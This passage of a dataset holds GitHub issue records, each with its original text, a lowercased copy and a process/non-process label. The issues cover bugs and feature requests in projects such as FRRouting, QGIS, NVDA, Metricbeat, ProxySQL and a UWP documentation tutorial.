4. Update the consent and enable the **Enforce e-consent flow again for enrolled participants** in E-Consent steps and publish the updates
5. Open the study which is enrolled in the mobile and refresh
A/R:- Updated consent version is not displaying for the user, even though new version is available from SB
E/R:- Updated consent version should be displayed for the user, whenever new version is available from SB | process | updated consent version is not available in the mobile steps login into the android application enroll into the study navigate to studies list screen update the consent and enable the enforce e consent flow again for enrolled participants in e consent steps and publish the updates open the study which is enrolled in the mobile and refresh a r updated consent version is not displaying for the user even though new version is available from sb e r updated consent version should be displayed for the user whenever new version is available from sb | 1
18,927 | 24,881,464,675 | IssuesEvent | 2022-10-28 01:46:45 | MicrosoftDocs/windows-dev-docs | https://api.github.com/repos/MicrosoftDocs/windows-dev-docs | closed | "Create and consume an app service" out of date? Undocumented "ExecutableOrStartPageIsRequired" setting. | uwp/prod processes-and-threading/tech Pri2 | I am trying to follow the tutorial [Create and consume an app service](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service) but can't get the ClientApp to successfully connect to the app service after deploying the service (instead I get back the status "AppNotInstalled"). I've gone through the "General app service troubleshooting" steps about a dozen times and verified everything is correct, but still can't get the client to connect.
The tutorial has us manually add the app service declaration to the raw `Package.appxmanifest` XML. Afterward, the declaration is visible in the "Declarations" tab of the appxmanifest GUI Editor:

I notice there is a toggle field "ExecutableOrStartPageIsRequired" which is selected by default. We can deselect this, but the change isn't saved - if we close and re-open the manifest, the box will be selected again. In other words, this setting can't be turned off. Doing a web search for "ExecutableOrStartPageIsRequired" only returns a few hits; **it seems this setting isn't documented by Microsoft**.
Because the ExecutableOrStartPageIsRequired setting can't be turned off, it follows that we are required to fill in either the Executable field or Start Page field. However, these fields are not covered in the tutorial. Are we actually required to fill in the Executable or Start Page field? Is there a way to actually disable the "ExecutableOrStartPageIsRequired" option?
---
#### Document Details
⚠ *Do not edit this section. It is required for learn.microsoft.com ➟ GitHub issue linking.*
* ID: edde9dbc-6e04-69cf-206e-123792666abf
* Version Independent ID: 9894e78f-3270-9485-4769-11050669b805
* Content: [Create and consume an app service - UWP applications](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service)
* Content Source: [uwp/launch-resume/how-to-create-and-consume-an-app-service.md](https://github.com/MicrosoftDocs/windows-dev-docs/blob/docs/uwp/launch-resume/how-to-create-and-consume-an-app-service.md)
* Product: **uwp**
* Technology: **processes-and-threading**
* GitHub Login: @alvinashcraft
* Microsoft Alias: **aashcraft** | 1.0 | "Create and consume an app service" out of date? Undocumented "ExecutableOrStartPageIsRequired" setting. - I am trying to follow the tutorial [Create and consume an app service](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service) but can't get the ClientApp to successfully connect to the app service after deploying the service (instead I get back the status "AppNotInstalled"). I've gone through the "General app service troubleshooting" steps about a dozen times and verified everything is correct, but still can't get the client to connect.
The tutorial has us manually add the app service declaration to the raw `Package.appxmanifest` XML. Afterward, the declaration is visible in the "Declarations" tab of the appxmanifest GUI Editor:

I notice there is a toggle field "ExecutableOrStartPageIsRequired" which is selected by default. We can deselect this, but the change isn't saved - if we close and re-open the manifest, the box will be selected again. In other words, this setting can't be turned off. Doing a web search for "ExecutableOrStartPageIsRequired" only returns a few hits; **it seems this setting isn't documented by Microsoft**.
Because the ExecutableOrStartPageIsRequired setting can't be turned off, it follows that we are required to fill in either the Executable field or Start Page field. However, these fields are not covered in the tutorial. Are we actually required to fill in the Executable or Start Page field? Is there a way to actually disable the "ExecutableOrStartPageIsRequired" option?
---
#### Document Details
⚠ *Do not edit this section. It is required for learn.microsoft.com ➟ GitHub issue linking.*
* ID: edde9dbc-6e04-69cf-206e-123792666abf
* Version Independent ID: 9894e78f-3270-9485-4769-11050669b805
* Content: [Create and consume an app service - UWP applications](https://learn.microsoft.com/en-us/windows/uwp/launch-resume/how-to-create-and-consume-an-app-service)
* Content Source: [uwp/launch-resume/how-to-create-and-consume-an-app-service.md](https://github.com/MicrosoftDocs/windows-dev-docs/blob/docs/uwp/launch-resume/how-to-create-and-consume-an-app-service.md)
* Product: **uwp**
* Technology: **processes-and-threading**
* GitHub Login: @alvinashcraft
* Microsoft Alias: **aashcraft** | process | create and consume an app service out of date undocumented executableorstartpageisrequired setting i am trying to follow the tutorial but can t get the clientapp to successfully connect to the app service after deploying the service instead i get back the status appnotinstalled i ve gone through the general app service troubleshooting steps about a dozen times and verified everything is correct but still can t get the client to connect the tutorial has us manually add the app service declaration to the raw package appxmanifest xml afterward the declaration is visible in the declarations tab of the appxmanifest gui editor i notice there is a toggle field executableorstartpageisrequired which is selected by default we can deselect this but the change isn t saved if we close and re open the manifest the box will be selected again in other words this setting can t be turned off doing a web search for executableorstartpageisrequired only returns a few hits it seems this setting isn t documented by microsoft because the executableorstartpageisrequired setting can t be turned off it follows that we are required to fill in either the executable field or start page field however these fields are not covered in the tutorial are we actually required to fill in the executable or start page field is there a way to actually disable the executableorstartpageisrequired option document details ⚠ do not edit this section it is required for learn microsoft com ➟ github issue linking id version independent id content content source product uwp technology processes and threading github login alvinashcraft microsoft alias aashcraft | 1 |
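For reference on the app service record above, the declaration the tutorial has readers add to `Package.appxmanifest` looks roughly like the fragment below (the entry point and service name are the tutorial's illustrative identifiers, not requirements). Note that the `Executable`/`EntryPoint` attributes live on the `Application` element itself, which is presumably what the undocumented "ExecutableOrStartPageIsRequired" toggle is checking, rather than anything on the app service extension:

```xml
<Application Id="App"
             Executable="$targetnametoken$.exe"
             EntryPoint="AppServiceProvider.App">
  <Extensions>
    <uap:Extension Category="windows.appService"
                   EntryPoint="AppServiceProvider.Inventory">
      <uap:AppService Name="com.microsoft.inventory" />
    </uap:Extension>
  </Extensions>
</Application>
```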
12,752 | 7,974,719,515 | IssuesEvent | 2018-07-17 06:57:14 | nvaccess/nvda | https://api.github.com/repos/nvaccess/nvda | closed | Delay of around 7 seconds when changing to application using configuration profiles other than normal | Braille Configuration profiles performance | Example:
1. Open Firefox
2. Visit Configuration profiles from NVDA.
3. Create a new profile called Web and assign it to the application.
When switching between Firefox and other applications, significant delays are encountered.
This is true of any application for which a separate config profile is created, e.g. Microsoft Word.
This behaviour has been observed in next and master builds of NVDA this week. Behaviour does not occur in NVDA 2017.4. Behaviour is present in NVDA 2018.1 RC1.
| True | Delay of around 7 seconds when changing to application using configuration profiles other than normal - Example:
1. Open Firefox
2. Visit Configuration profiles from NVDA.
3. Create a new profile called Web and assign it to the application.
When switching between Firefox and other applications, significant delays are encountered.
This is true of any application for which a separate config profile is created, e.g. Microsoft Word.
This behaviour has been observed in next and master builds of NVDA this week. Behaviour does not occur in NVDA 2017.4. Behaviour is present in NVDA 2018.1 RC1.
| non_process | delay of around seconds when changing to application using configuration profiles other than normal example open firefox visit configuration profiles from nvda create a new profile called web and assign it to the application when switching between firefox and other applications significant delays are encountered this is true of any application for which a separate config profile is created e g microsoft word this behaviour has been observed in next and master builds of nvda this week behaviour does not occur nvda behaviour is present in nvda | 0 |
34,497 | 4,930,967,516 | IssuesEvent | 2016-11-28 08:29:09 | wangding/courses | https://api.github.com/repos/wangding/courses | closed | 13.4 Submit black-box test case results | testing learning | In the GitHub issue description or issue-update description, submit all the test cases designed in task 13.3 in table form.
Note the table formatting requirements in the issue description: the number of rows in the table depends on the number of test cases, and the number of columns must match the number of columns in the issue template. | 1.0 | 13.4 Submit black-box test case results - In the GitHub issue description or issue-update description, submit all the test cases designed in task 13.3 in table form.
Note the table formatting requirements in the issue description: the number of rows in the table depends on the number of test cases, and the number of columns must match the number of columns in the issue template. | non_process | submit black box test case results in the github issue description or issue update description submit all the test cases designed in task in table form note the table formatting requirements in the issue description the number of rows in the table depends on the number of test cases and the number of columns must match the number of columns in the issue template | 0
36,535 | 17,777,134,923 | IssuesEvent | 2021-08-30 20:48:38 | FRRouting/frr | https://api.github.com/repos/FRRouting/frr | closed | frr-7.0-10.el8.x86_64 and 100% usage CPU past start before ~30min. | performance triage | This day i was upgrade frr-7.0-5.el8.x86_64 to frr-7.0-10.el8.x86_64 and past start FRR have 100% usage CPU before about 30min.
On version frr-7.0-5.el8.x86_64 all was ok.
To Reproduce
1. dnf update
**Screenshots**
```
Tasks: 131 total, 3 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0,3 us, 0,7 sy, 0,0 ni, 98,3 id, 0,7 wa, 0,0 hi, 0,0 si, 0,0 st
%Cpu1 : 22,7 us, 74,7 sy, 0,0 ni, 2,3 id, 0,0 wa, 0,0 hi, 0,3 si, 0,0 st
%Cpu2 : 0,3 us, 1,3 sy, 0,0 ni, 69,2 id, 0,0 wa, 1,7 hi, 27,4 si, 0,0 st
%Cpu3 : 0,0 us, 0,0 sy, 0,0 ni, 26,4 id, 0,0 wa, 2,0 hi, 71,6 si, 0,0 st
MiB Mem : 7782,4 total, 2407,4 free, 1612,0 used, 3763,1 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5460,4 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
131232 frr 15 -5 902276 697404 3816 R 99,3 8,8 22:15.96 bgpd
[...]
```
past about 30min i see:
```
Tasks: 134 total, 1 running, 132 sleeping, 0 stopped, 1 zombie
%Cpu(s): 0,2 us, 0,2 sy, 0,0 ni, 76,7 id, 0,0 wa, 1,1 hi, 21,8 si, 0,0 st
MiB Mem : 7782,4 total, 2413,0 free, 1599,1 used, 3770,3 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5477,5 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
29127 rngd 20 0 381428 6944 6108 S 0,7 0,1 68:25.86 rngd
10 root 20 0 0 0 0 I 0,3 0,0 23:25.12 rcu_sched
611 root 20 0 184288 75508 73716 S 0,3 0,9 69:55.56 systemd-journal
73735 root 20 0 535004 29340 25544 S 0,3 0,4 0:11.66 rsyslogd
131222 frr 15 -5 818832 523584 2880 S 0,3 6,6 0:31.34 zebra
131232 frr 15 -5 902276 697404 3816 S 0,3 8,8 23:56.76 bgpd
[...]
```
I was trying manually:

1. `systemctl stop frr`
2. `systemctl start frr`

and the same ~30 minutes of 100% CPU usage on one core followed.
```
root@gateway rc.d]# systemctl status frr
● frr.service - FRRouting (FRR)
Loaded: loaded (/usr/lib/systemd/system/frr.service; enabled; vendor preset: disabled)
Active: active (running) since Mon 2020-12-14 10:55:31 CET; 42min ago
Process: 131068 ExecStop=/usr/lib/frr/frr stop (code=exited, status=0/SUCCESS)
Process: 131203 ExecStart=/usr/lib/frr/frr start (code=exited, status=0/SUCCESS)
Tasks: 8 (limit: 49614)
Memory: 1.1G
CGroup: /system.slice/frr.service
├─131222 /usr/lib/frr/zebra -d -A 127.0.0.1
├─131232 /usr/lib/frr/bgpd -d -A 127.0.0.1
└─131247 /usr/lib/frr/watchfrr -d -r /usr/lib/frr/frr restart %s -s /usr/lib/frr/frr start %s -k /usr/lib/frr/frr stop %s zebra bgpd
gru 14 10:55:31 gateway.localdomain frr[131203]: 2020/12/14 10:55:31 warnings: ZEBRA: [EC 4043309105] Disabling MPLS support (no kernel support)
gru 14 10:55:31 gateway.localdomain frr[131203]: [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: bgpd [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: Starting FRRouting monitor daemon:
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: watchfrr 7.0 starting: vty@0
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: zebra state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: bgpd state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: all daemons up, doing startup-complete notify
gru 14 10:55:31 gateway.localdomain frr[131203]: watchfrr[ OK ]
gru 14 10:55:31 gateway.localdomain systemd[1]: Started FRRouting (FRR).
```
```
In the logs in /var/log/frr I don't see any errors or warnings
```
**Versions**
- OS Version: CentOS 8
- Kernel:
```
uname -a
Linux gateway.localdomain 4.18.0-193.19.1.el8_2.x86_64 #1 SMP Mon Sep 14 14:37:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
- FRR Version: frr-7.0-10.el8.x86_64
**Additional context**
What is wrong with this FRR update? | True | frr-7.0-10.el8.x86_64 and 100% usage CPU past start before ~30min. - Today I upgraded frr-7.0-5.el8.x86_64 to frr-7.0-10.el8.x86_64, and after starting, FRR has 100% CPU usage for about 30 min.
On version frr-7.0-5.el8.x86_64 everything was OK.
To Reproduce
1. dnf update
**Screenshots**
```
Tasks: 131 total, 3 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu0 : 0,3 us, 0,7 sy, 0,0 ni, 98,3 id, 0,7 wa, 0,0 hi, 0,0 si, 0,0 st
%Cpu1 : 22,7 us, 74,7 sy, 0,0 ni, 2,3 id, 0,0 wa, 0,0 hi, 0,3 si, 0,0 st
%Cpu2 : 0,3 us, 1,3 sy, 0,0 ni, 69,2 id, 0,0 wa, 1,7 hi, 27,4 si, 0,0 st
%Cpu3 : 0,0 us, 0,0 sy, 0,0 ni, 26,4 id, 0,0 wa, 2,0 hi, 71,6 si, 0,0 st
MiB Mem : 7782,4 total, 2407,4 free, 1612,0 used, 3763,1 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5460,4 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
131232 frr 15 -5 902276 697404 3816 R 99,3 8,8 22:15.96 bgpd
[...]
```
After about 30 min I see:
```
Tasks: 134 total, 1 running, 132 sleeping, 0 stopped, 1 zombie
%Cpu(s): 0,2 us, 0,2 sy, 0,0 ni, 76,7 id, 0,0 wa, 1,1 hi, 21,8 si, 0,0 st
MiB Mem : 7782,4 total, 2413,0 free, 1599,1 used, 3770,3 buff/cache
MiB Swap: 1024,0 total, 1024,0 free, 0,0 used. 5477,5 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
29127 rngd 20 0 381428 6944 6108 S 0,7 0,1 68:25.86 rngd
10 root 20 0 0 0 0 I 0,3 0,0 23:25.12 rcu_sched
611 root 20 0 184288 75508 73716 S 0,3 0,9 69:55.56 systemd-journal
73735 root 20 0 535004 29340 25544 S 0,3 0,4 0:11.66 rsyslogd
131222 frr 15 -5 818832 523584 2880 S 0,3 6,6 0:31.34 zebra
131232 frr 15 -5 902276 697404 3816 S 0,3 8,8 23:56.76 bgpd
[...]
I was trying manually:
1. systemctl stop frr
2. systemctl start frr
and the same happened: about 30 min of 100% CPU usage on one core.
```
```
[root@gateway rc.d]# systemctl status frr
● frr.service - FRRouting (FRR)
Loaded: loaded (/usr/lib/systemd/system/frr.service; enabled; vendor preset: disabled)
Active: active (running) since Mon 2020-12-14 10:55:31 CET; 42min ago
Process: 131068 ExecStop=/usr/lib/frr/frr stop (code=exited, status=0/SUCCESS)
Process: 131203 ExecStart=/usr/lib/frr/frr start (code=exited, status=0/SUCCESS)
Tasks: 8 (limit: 49614)
Memory: 1.1G
CGroup: /system.slice/frr.service
├─131222 /usr/lib/frr/zebra -d -A 127.0.0.1
├─131232 /usr/lib/frr/bgpd -d -A 127.0.0.1
└─131247 /usr/lib/frr/watchfrr -d -r /usr/lib/frr/frr restart %s -s /usr/lib/frr/frr start %s -k /usr/lib/frr/frr stop %s zebra bgpd
gru 14 10:55:31 gateway.localdomain frr[131203]: 2020/12/14 10:55:31 warnings: ZEBRA: [EC 4043309105] Disabling MPLS support (no kernel support)
gru 14 10:55:31 gateway.localdomain frr[131203]: [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: bgpd [ OK ]
gru 14 10:55:31 gateway.localdomain frr[131203]: Starting FRRouting monitor daemon:
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: watchfrr 7.0 starting: vty@0
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: zebra state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: bgpd state -> up : connect succeeded
gru 14 10:55:31 gateway.localdomain watchfrr[131247]: all daemons up, doing startup-complete notify
gru 14 10:55:31 gateway.localdomain frr[131203]: watchfrr[ OK ]
gru 14 10:55:31 gateway.localdomain systemd[1]: Started FRRouting (FRR).
```
```
In the logs in /var/log/frr I don't see any errors or warnings
```
**Versions**
- OS Version: CentOS 8
- Kernel:
```
uname -a
Linux gateway.localdomain 4.18.0-193.19.1.el8_2.x86_64 #1 SMP Mon Sep 14 14:37:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
- FRR Version: frr-7.0-10.el8.x86_64
**Additional context**
What is it wrong with this update FRR? | non_process | frr and usage cpu past start before this day i was upgrade frr to frr and past start frr have usage cpu before about on version frr all was ok to reproduce dnf update screenshots tasks total running sleeping stopped zombie us sy ni id wa hi si st us sy ni id wa hi si st us sy ni id wa hi si st us sy ni id wa hi si st mib mem total free used buff cache mib swap total free used avail mem pid user pr ni virt res shr s cpu mem time command frr r bgpd past about i see tasks total running sleeping stopped zombie cpu s us sy ni id wa hi si st mib mem total free used buff cache mib swap total free used avail mem pid user pr ni virt res shr s cpu mem time command rngd s rngd root i rcu sched root s systemd journal root s rsyslogd frr s zebra frr s bgpd i was trying manualy systemct stop frr systemct start frr and this same about cpu usage one core root gateway rc d systemctl status frr ● frr service frrouting frr loaded loaded usr lib systemd system frr service enabled vendor preset disabled active active running since mon cet ago process execstop usr lib frr frr stop code exited status success process execstart usr lib frr frr start code exited status success tasks limit memory cgroup system slice frr service ├─ usr lib frr zebra d a ├─ usr lib frr bgpd d a └─ usr lib frr watchfrr d r usr lib frr frr restart s s usr lib frr frr start s k usr lib frr frr stop s zebra bgpd gru gateway localdomain frr warnings zebra disabling mpls support no kernel support gru gateway localdomain frr gru gateway localdomain frr bgpd gru gateway localdomain frr starting frrouting monitor daemon gru gateway localdomain watchfrr watchfrr starting vty gru gateway localdomain watchfrr zebra state up connect succeeded gru gateway localdomain watchfrr bgpd state up connect succeeded gru gateway localdomain watchfrr all daemons up doing startup complete notify gru gateway localdomain frr watchfrr gru gateway localdomain systemd started frrouting 
frr in logs var log frrr i don t see any error and warnings versions os version centos kernel uname a linux gateway localdomain smp mon sep utc gnu linux frr version frr additional context what is it wrong with this update frr | 0 |
15,030 | 18,751,660,480 | IssuesEvent | 2021-11-05 03:19:32 | streamnative/pulsar-flink | https://api.github.com/repos/streamnative/pulsar-flink | closed | Check the topic's markDeletePosition and readPosition are very different | type/question platform/data-processing | Using the flink-pulsar reader, I can see that the topic's markDeletePosition and readPosition are very different. The log shows "Successfully committed offset255271:4691:6:0 to topic"; why is markDeletePosition not updated?

 | 1.0 | Check the topic's markDeletePosition and readPosition are very different - Using the flink-pulsar reader, I can see that the topic's markDeletePosition and readPosition are very different. The log shows "Successfully committed offset255271:4691:6:0 to topic"; why is markDeletePosition not updated?

| process | check the topic s markdeleteposition and readposition are very different use the reader of flink pulsar to view the topic s markdeleteposition and readposition are very different the log shows successfully committed to topic why is markdeleteposition not updated | 1 |
34,189 | 2,776,137,113 | IssuesEvent | 2015-05-04 20:02:55 | rrev/Pastebin | https://api.github.com/repos/rrev/Pastebin | opened | Fix "Back button" in code paste | bug priority-important | When opening a paste from trending pastes or my pastes, it should go back to the previous page and not to the home page | 1.0 | Fix "Back button" in code paste - When opening a paste from trending pastes or my pastes, it should go back to the previous page and not to the home page | non_process | fix back button in code paste when opening a paste from trending pastes or my pastes it should go back to the previous page and not to the home page | 0
14,032 | 16,827,644,192 | IssuesEvent | 2021-06-17 20:59:27 | googleapis/python-bigquery | https://api.github.com/repos/googleapis/python-bigquery | closed | minor: add integration test for column acls feature | api: bigquery priority: p3 testing type: process | Once the datacatalog v1 endpoint releases a version with support for the PolicyTagManager client, let's add an integration test to better exercise the column ACL feature.
[This commit](https://github.com/googleapis/googleapis/commit/91eee3d039fbdbadee008393504900287bbc6f43) to proto comments should unblock the datacatalog release. | 1.0 | minor: add integration test for column acls feature - Once the datacatalog v1 endpoint releases a version with support for the PolicyTagManager client, let's add an integration test to better exercise the column ACL feature.
[This commit](https://github.com/googleapis/googleapis/commit/91eee3d039fbdbadee008393504900287bbc6f43) to proto comments should unblock the datacatalog release. | process | minor add integration test for column acls feature once the datacatalog endpoint releases a version with support for the policytagmanager client let s add an integration test to better exercise the column acl feature to proto comments should unblock the datacatalog release | 1 |
253,837 | 19,180,718,902 | IssuesEvent | 2021-12-04 10:42:36 | Naman-5/SMSPrism | https://api.github.com/repos/Naman-5/SMSPrism | closed | Edit README.md file | documentation | - Give basic information about the project
- Tech stack used during the course of the project
- Screenshots of the front end application
- About the dataset
- How to report issue
- How to contribute to the project | 1.0 | Edit README.md file - - Give basic information about the project
- Tech stack used during the course of the project
- Screenshots of the front end application
- About the dataset
- How to report issue
- How to contribute to the project | non_process | edit readme md file give basic information about the project tech stack used during the course of the project screenshots of the front end application about the dataset how to report issue how to contribute to the project | 0 |
1,731 | 4,408,261,411 | IssuesEvent | 2016-08-12 00:36:20 | elastic/beats | https://api.github.com/repos/elastic/beats | opened | drop_event does not work in a Metricbeat module filter | :Processors bug Metricbeat v5.0.0-alpha5 | - Version: 5.0.0-alpha5
- Operating System: Any
- Steps to Reproduce:
```
metricbeat:
modules:
- module: system
metricsets: [filesystem]
period: 15s
filters:
- drop_event:
when:
regexp:
mount_point: '/dev'
output.console:
pretty: true
```
When the event is published this is what you get. Notice the `null`. What should happen is the whole event is dropped.
```
{
"@timestamp": "2016-08-11T23:03:34.988Z",
"beat": {
"hostname": "myhost",
"name": "myhost"
},
"metricset": {
"module": "system",
"name": "filesystem",
"rtt": 197
},
"system": {
"filesystem": null
},
"type": "metricsets"
}
```
| 1.0 | drop_event does not work in a Metricbeat module filter - - Version: 5.0.0-alpha5
- Operating System: Any
- Steps to Reproduce:
```
metricbeat:
modules:
- module: system
metricsets: [filesystem]
period: 15s
filters:
- drop_event:
when:
regexp:
mount_point: '/dev'
output.console:
pretty: true
```
When the event is published this is what you get. Notice the `null`. What should happen is the whole event is dropped.
```
{
"@timestamp": "2016-08-11T23:03:34.988Z",
"beat": {
"hostname": "myhost",
"name": "myhost"
},
"metricset": {
"module": "system",
"name": "filesystem",
"rtt": 197
},
"system": {
"filesystem": null
},
"type": "metricsets"
}
```
| process | drop event does not work in a metricbeat module filter version operating system any steps to reproduce metricbeat modules module system metricsets period filters drop event when regexp mount point dev output console pretty true when the event is published this is what you get notice the null what should happen is the whole event is dropped timestamp beat hostname myhost name myhost metricset module system name filesystem rtt system filesystem null type metricsets | 1 |
12,418 | 14,921,219,857 | IssuesEvent | 2021-01-23 09:02:59 | threefoldfoundation/tft-stellar | https://api.github.com/repos/threefoldfoundation/tft-stellar | closed | Make the tfta to tft service multivalidation and multisignature | process_wontfix type_feature | Questions:
- [ ] inter threebot/service communication
An easy way would be for the initiating service running in Dubai to serve and collect the signed transactions. It knows the cosigners (they can be collected from the issuer account, so it can validate whether the added signatures match)
A more decentralized way would be to use something like libp2p: #193
TODO:
- [ ] One infoscript/function based on a hash #195 | 1.0 | Make the tfta to tft service multivalidation and multisignature - Questions:
- [ ] inter threebot/service communication
An easy way would be for the initiating service running in Dubai to serve and collect the signed transactions. It knows the cosigners (they can be collected from the issuer account, so it can validate whether the added signatures match)
A more decentralized way would be to use something like libp2p: #193
TODO:
- [ ] One infoscript/function based on a hash #195 | process | make the tfta to tft service multivalidation and multisignature questions inter threebot service communication an easy way way would be for the iniating service running in dubai to service and collect the signed transactions it knows the cosigners can be collected from the issuer account so it can validate if the added signatures match a more decentralized way would be to use something like todo one infoscript function based on a hash | 1 |
19,093 | 25,147,988,869 | IssuesEvent | 2022-11-10 07:40:30 | qgis/QGIS | https://api.github.com/repos/qgis/QGIS | closed | Processing/SAGA: translate inputs to GPKG instead of SHP | Processing Feature Request | ### What is the bug or the crash?
Some algorithms don't work when the input layer is a GeoPackage with a long field name.
The problem seems to be that the input layer is exported to shapefile format, where the long field name is truncated, but the command still uses the original (untruncated) field name.
Error: executing tool [Thin Plate Spline (TIN)]
2022-01-31T20:57:49 INFO SAGA execution commands
grid_spline "Thin Plate Spline (TIN)" -TARGET_DEFINITION 0 -SHAPES "/tmp/processing_MyuIjo/1836dbcd0d794855854e7d62fbcb2995/SHAPES.shp" -FIELD "campoconnomelungo" -REGULARISATION 0.0001 -LEVEL 0 -FRAME true -TARGET_USER_SIZE 100.0 -TARGET_USER_FITS 0 -TARGET_OUT_GRID "/tmp/processing_MyuIjo/ebf9df1e7f3645338ab182ed63bdf427/TARGET_OUT_GRID.sdat"
2022-01-31T20:57:50 INFO SAGA execution console output
### Steps to reproduce the issue
- load sample data,
- open processing
- use a SAGA processing that use starting vector format, es: thin plate spline (tin)
### Versions
QGIS version | 3.23.0-Master
Qt version | 5.12.8
Python version | 3.8.10
GDAL/OGR version | 3.0.4
PROJ version | 6.3.1
EPSG Registry database version | v9.8.6 (2020-01-22)
Compiled against GEOS | 3.8.0-CAPI-1.13.1 | Running against GEOS | 3.8.0-CAPI-1.13.1
SQLite version | 3.31.1
PostgreSQL client version | 14.1 (Ubuntu 14.1-2.pgdg20.04+1)
SpatiaLite version | 4.3.0a
QWT version | 6.1.4
QScintilla2 version | 2.11.2
OS version | Ubuntu 20.04.3 LTS
Active Python plugins
qtiles | 1.7.1
db-style-manager | 0.8
OSMDownloader | 1.0.3
QuickOSM | 2.0.0
quick_map_services | 0.19.27
sagaprovider | 2.12.99
db_manager | 0.1.20
processing | 2.12.99
grassprovider | 2.12.99
### Supported QGIS version
- [X] I'm running a supported QGIS version according to the roadmap.
### New profile
- [ ] I tried with a new QGIS profile
### Additional context
[sampledata.gpkg.zip](https://github.com/qgis/QGIS/files/7973913/sampledata.gpkg.zip)
| 1.0 | Processing/SAGA: translate inputs to GPKG instead of SHP - ### What is the bug or the crash?
Some algorithms don't work when the input layer is a GeoPackage with a long field name.
The problem seems to be that the input layer is exported to shapefile format, where the long field name is truncated, but the command still uses the original (untruncated) field name.
Error: executing tool [Thin Plate Spline (TIN)]
2022-01-31T20:57:49 INFO SAGA execution commands
grid_spline "Thin Plate Spline (TIN)" -TARGET_DEFINITION 0 -SHAPES "/tmp/processing_MyuIjo/1836dbcd0d794855854e7d62fbcb2995/SHAPES.shp" -FIELD "campoconnomelungo" -REGULARISATION 0.0001 -LEVEL 0 -FRAME true -TARGET_USER_SIZE 100.0 -TARGET_USER_FITS 0 -TARGET_OUT_GRID "/tmp/processing_MyuIjo/ebf9df1e7f3645338ab182ed63bdf427/TARGET_OUT_GRID.sdat"
2022-01-31T20:57:50 INFO SAGA execution console output
### Steps to reproduce the issue
- load the sample data,
- open Processing,
- run a SAGA algorithm that uses a vector layer as input, e.g. Thin Plate Spline (TIN)
### Versions
QGIS version | 3.23.0-Master
Qt version | 5.12.8
Python version | 3.8.10
GDAL/OGR version | 3.0.4
PROJ version | 6.3.1
EPSG Registry database version | v9.8.6 (2020-01-22)
Compiled against GEOS | 3.8.0-CAPI-1.13.1 | Running against GEOS | 3.8.0-CAPI-1.13.1
SQLite version | 3.31.1
PostgreSQL client version | 14.1 (Ubuntu 14.1-2.pgdg20.04+1)
SpatiaLite version | 4.3.0a
QWT version | 6.1.4
QScintilla2 version | 2.11.2
OS version | Ubuntu 20.04.3 LTS
Active Python plugins
qtiles | 1.7.1
db-style-manager | 0.8
OSMDownloader | 1.0.3
QuickOSM | 2.0.0
quick_map_services | 0.19.27
sagaprovider | 2.12.99
db_manager | 0.1.20
processing | 2.12.99
grassprovider | 2.12.99
### Supported QGIS version
- [X] I'm running a supported QGIS version according to the roadmap.
### New profile
- [ ] I tried with a new QGIS profile
### Additional context
[sampledata.gpkg.zip](https://github.com/qgis/QGIS/files/7973913/sampledata.gpkg.zip)
| process | processing saga translate inputs to gpkg instead of shp what is the bug or the crash some algorithms don t work when the starting layer is a gpkg with a long name field the problem seems to be that the starting layer is exported in shapefile format the long name is truncated but the command still use the original layer name error executing tool info saga execution commands grid spline thin plate spline tin target definition shapes tmp processing myuijo shapes shp field campoconnomelungo regularisation level frame true target user size target user fits target out grid tmp processing myuijo target out grid sdat info saga execution console output steps to reproduce the issue load sample data open processing use a saga processing that use starting vector format es thin plate spline tin versions qgis version master qt version python version gdal ogr version proj version epsg registry database version compiled against geos capi running against geos capi sqlite version postgresql client version ubuntu spatialite version qwt version version os version ubuntu lts active python plugins qtiles db style manager osmdownloader quickosm quick map services sagaprovider db manager processing grassprovider supported qgis version i m running a supported qgis version according to the roadmap new profile i tried with a new qgis profile additional context | 1 |
3,658 | 6,694,644,534 | IssuesEvent | 2017-10-10 03:24:06 | york-region-tpss/stp | https://api.github.com/repos/york-region-tpss/stp | opened | Watering Assignment - Redesigning the Watering Assignment | enhancement process workflow | Design a workflow with user input on-hold items and calculated assign items | 1.0 | Watering Assignment - Redesigning the Watering Assignment - Design a workflow with user input on-hold items and calculated assign items | process | watering assignment redesigning the watering assignment design a workflow with user input on hold items and calculated assign items | 1 |
1,464 | 4,044,547,024 | IssuesEvent | 2016-05-21 11:42:58 | sysown/proxysql | https://api.github.com/repos/sysown/proxysql | closed | Add a new column mysql_query_rules.digest | ADMIN MYSQL PROTOCOL QUERY PROCESSOR ROUTING | Once a query is identified from stats_mysql_query_digest, it is sometimes possible to create query rules based on it.
Identifying a query based on its digest would make processing a lot easier. | 1.0 | Add a new column mysql_query_rules.digest - Once a query is identified from stats_mysql_query_digest, it is sometimes possible to create query rules based on it.
Identifying a query based on its digest would make processing a lot easier. | process | add a new column mysql query rules digest once a query is identified from stats mysql query digest it is sometime possible to create query rules based on it identifying a query based on its digest would make processing a lot easier | 1 |
